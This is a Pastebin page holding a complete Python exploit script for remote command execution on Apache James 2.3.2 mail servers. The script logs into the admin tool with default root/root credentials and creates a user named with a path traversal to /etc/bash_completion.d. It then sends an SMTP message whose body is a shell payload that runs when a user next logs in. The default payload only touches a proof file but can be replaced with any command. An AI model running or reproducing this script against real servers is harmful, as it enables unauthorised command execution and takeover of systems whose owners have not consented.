Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- """An exploit for Apache James 2.3.2 that executes remote commands.
- This script works on Apache James deployments that use the default
- configuration. It enqueues a payload to be executed the next time a user logs
- in to the machine.
- The default payload is "touch /tmp/proof.txt." However, if the server runs as
- root, then the following command may be used:
- [ "$(id -u)" == "0" ] && touch /root/proof.txt
- For more details, see: https://www.exploit-db.com/exploits/35513/.
- """
- import gflags
- import socket
- import sys
- import time
- FLAGS = gflags.FLAGS
- gflags.DEFINE_string(
- 'payload', 'touch /tmp/proof.txt', 'The payload to execute.')
- gflags.DEFINE_string(
- 'host', '127.0.0.1', 'The host address of the Apache James deployment.')
- gflags.DEFINE_integer(
- 'admin_port', '4555', 'The port number of the administration tool.')
- gflags.DEFINE_integer('smtp_port', '25', 'The port number of the SMTP server.')
- # Default administrator credentials
- ADMIN_USER = 'root'
- ADMIN_PASSWORD = 'root'
- # The number of bytes to receive from the admin and SMTP servers.
- RECV_BYTES = 1024
- # The number of seconds to sleep after receiving data from the SMTP server.
- SLEEP_SEC = 0.2
- def ConnectToAdminServer():
- """Connects to the administration server.
- Returns:
- An open socket to the administration server.
- """
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.connect((FLAGS.host, FLAGS.admin_port))
- s.recv(RECV_BYTES)
- s.send(ADMIN_USER + '\n')
- s.recv(RECV_BYTES)
- s.send(ADMIN_PASSWORD + '\n')
- s.recv(RECV_BYTES)
- return s
- def ConnectToSmtpServer():
- """Connects to the SMTP server.
- Returns:
- An open socket to the SMTP server.
- """
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.connect((FLAGS.host, FLAGS.smtp_port))
- s.send('ehlo team@team.pl\r\n')
- RecvAndSleep(s)
- return s
- def CreateNewSmtpUser(s):
- """Creates a new SMTP user.
- Args:
- s: An open socket to the administration tool.
- """
- s.send('adduser ../../../../../../../../etc/bash_completion.d exploit\n')
- s.recv(RECV_BYTES)
- s.send('quit\n')
- s.close()
- def RecvAndSleep(s):
- """Receives data from a socket and sleeps.
- Args:
- s: An open socket.
- """
- s.recv(RECV_BYTES)
- time.sleep(SLEEP_SEC)
- def SendSmtpPayload(s):
- """Sends the payload to the SMTP server.
- Args:
- s: An open socket to the SMTP server.
- """
- s.send('mail from: <\'@team.pl>\r\n')
- RecvAndSleep(s)
- # Also try: ../../../../../../../../etc/bash_completion.d@hostname>\r\n
- s.send('rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n')
- RecvAndSleep(s)
- s.send('data\r\n')
- RecvAndSleep(s)
- s.send('From: team@team.pl\r\n')
- s.send('\r\n')
- s.send('\'\n')
- s.send(FLAGS.payload + '\n')
- s.send('\r\n.\r\n')
- RecvAndSleep(s)
- s.send('quit\r\n')
- RecvAndSleep(s)
- s.close()
- def Main(argv):
- try:
- argv = FLAGS(argv)
- except gflags.FlagsError, e:
- print '%s\nUsage: %s ARGS\n%s' % (e, sys.argv[0], FLAGS)
- sys.exit(-1)
- CreateNewSmtpUser(ConnectToAdminServer())
- SendSmtpPayload(ConnectToSmtpServer())
- if __name__ == '__main__':
- Main(sys.argv)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement